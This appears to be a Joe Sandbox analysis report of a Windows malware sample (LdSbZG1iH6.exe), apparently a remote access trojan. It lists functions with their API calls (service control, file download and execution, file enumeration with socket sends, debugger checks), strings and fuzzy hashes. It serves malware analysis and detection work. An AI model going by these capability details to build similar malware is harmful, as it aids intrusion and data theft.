                                                                                                                                                Function 00446270 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: FSE$FSE$PkGNG
                                                                                                                                                • API String ID: 0-1266307253
                                                                                                                                                • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                                                                                                                • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                                                                                                                                • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                                                                                                                • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                                                                                                                                Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 276877138-0
                                                                                                                                                • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                                                                                                                • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                                                                                • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                                                                                                                • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                                                                                Function 0040F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00413584: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
                                                                                                                                                  • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
                                                                                                                                                  • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040F905
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                • String ID: 5.1.3 Pro$override$pth_unenc
                                                                                                                                                • API String ID: 2281282204-1392497409
                                                                                                                                                • Opcode ID: b03823e6d7a1939832695edbca538e9326227c7cb22747d0e4ffc58481ea478f
                                                                                                                                                • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                                                                                • Opcode Fuzzy Hash: b03823e6d7a1939832695edbca538e9326227c7cb22747d0e4ffc58481ea478f
                                                                                                                                                • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                                                                                                Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00452555
                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0045257E
                                                                                                                                                • GetACP.KERNEL32 ref: 00452593
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                                • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                                                                                • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                                • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                                                                                Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                                                                                                                • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                                                                                • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                                                                                • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                • String ID: SETTINGS
                                                                                                                                                • API String ID: 3473537107-594951305
                                                                                                                                                • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                                • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                                                                                • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                                • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                                                                                Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 004096A5
                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1157919129-0
                                                                                                                                                • Opcode ID: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                                                                                                                                • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                                                                                • Opcode Fuzzy Hash: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                                                                                                                                • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                                                                                Function 00452690 Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                                                                                                                • GetUserDefaultLCID.KERNEL32 ref: 0045279C
                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0045286D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 745075371-0
                                                                                                                                                • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                                • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                                                                                • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                                • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                                                                                Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1771804793-0
                                                                                                                                                • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                                                                                                                • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                                                                                • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                                                                                                                • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                                                                                Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DownloadExecuteFileShell
                                                                                                                                                • String ID: C:\Users\user\Desktop\LdSbZG1iH6.exe$open
                                                                                                                                                • API String ID: 2825088817-2965086157
                                                                                                                                                • Opcode ID: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                                                                                                                                • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                                                                                • Opcode Fuzzy Hash: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                                                                                                                                • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                                                                                Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFind$FirstNextsend
                                                                                                                                                • String ID: XPG$XPG
                                                                                                                                                • API String ID: 4113138495-1962359302
                                                                                                                                                • Opcode ID: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                                                                                                                                • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                                                                                • Opcode Fuzzy Hash: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                                                                                                                                • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                                                                                                Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                                                                                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNELBASE(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                                                                                                                                  • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                • API String ID: 4127273184-3576401099
                                                                                                                                                • Opcode ID: 151fde30394074386c3475a809e11d1a6336c1573d3ef2cd27d1ca554eb4e09d
                                                                                                                                                • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                                                                                • Opcode Fuzzy Hash: 151fde30394074386c3475a809e11d1a6336c1573d3ef2cd27d1ca554eb4e09d
                                                                                                                                                • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                                                                                Function 0041CA6D Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                                                                                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNELBASE(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                                                                                                                                  • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                • API String ID: 4127273184-3576401099
                                                                                                                                                • Opcode ID: 4d6389c29deabeee51a67b5fadf45e106198a50391e212cd7c27e14953ae43fd
                                                                                                                                                • Instruction ID: 1d4fccf664b116fd7e9026c1daa93839c24cbfeedf45b0e65449f5778d70c30d
                                                                                                                                                • Opcode Fuzzy Hash: 4d6389c29deabeee51a67b5fadf45e106198a50391e212cd7c27e14953ae43fd
                                                                                                                                                • Instruction Fuzzy Hash: DBF0C272BC421022D82931B96DAFBFE18058742F61F15412BF302652CAD4CE6A81428F
                                                                                                                                                Function 00451D58 Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00451E3A
                                                                                                                                                • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                                                                                                                • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451F7B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4212172061-0
                                                                                                                                                • Opcode ID: 715b93ef3f017ee4fea0110e94a068843382a27aff4af5d2daf4b4fdd25eb79d
                                                                                                                                                • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                                                                                • Opcode Fuzzy Hash: 715b93ef3f017ee4fea0110e94a068843382a27aff4af5d2daf4b4fdd25eb79d
                                                                                                                                                • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                                                                                Function 0044942D Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 0044943D
                                                                                                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                • GetTimeZoneInformation.KERNEL32 ref: 0044944F
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 004494C7
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 004494F4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 806657224-0
                                                                                                                                                • Opcode ID: aeb37be2ef55a5d103ab6b4be93faccb032caed00e04dd613037f001c8cf3bb4
                                                                                                                                                • Instruction ID: d52e19fe16dfdee109f40d049db845c42e01460133d57766726f1505d2785bee
                                                                                                                                                • Opcode Fuzzy Hash: aeb37be2ef55a5d103ab6b4be93faccb032caed00e04dd613037f001c8cf3bb4
                                                                                                                                                • Instruction Fuzzy Hash: 2D31F371904205EFDB15DF69CE8186EBBB8FF0572072446AFE024A73A1D3748D41EB28
                                                                                                                                                Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2829624132-0
                                                                                                                                                • Opcode ID: 711793eb573856c12bfad09b44d2354213151b00c391b4c97ce46ce3e25352d9
                                                                                                                                                • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                                                                                • Opcode Fuzzy Hash: 711793eb573856c12bfad09b44d2354213151b00c391b4c97ce46ce3e25352d9
                                                                                                                                                • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                                                                                Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                                                                • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                                                                                • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                                                                • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                                                                                Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00433550,00000034,?,?,00000000), ref: 004338DA
                                                                                                                                                • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?), ref: 004338F0
                                                                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?,0041E2E2), ref: 00433902
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1815803762-0
                                                                                                                                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                                • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                                                                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
